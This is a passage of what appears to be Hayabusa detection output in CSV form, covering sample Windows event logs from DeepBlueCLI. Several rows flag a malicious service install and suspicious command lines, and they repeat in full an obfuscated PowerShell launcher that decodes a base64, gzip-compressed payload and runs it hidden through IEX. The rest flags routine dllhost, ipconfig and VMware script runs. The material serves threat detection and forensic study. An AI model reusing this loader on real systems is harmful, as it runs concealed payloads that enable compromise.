Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 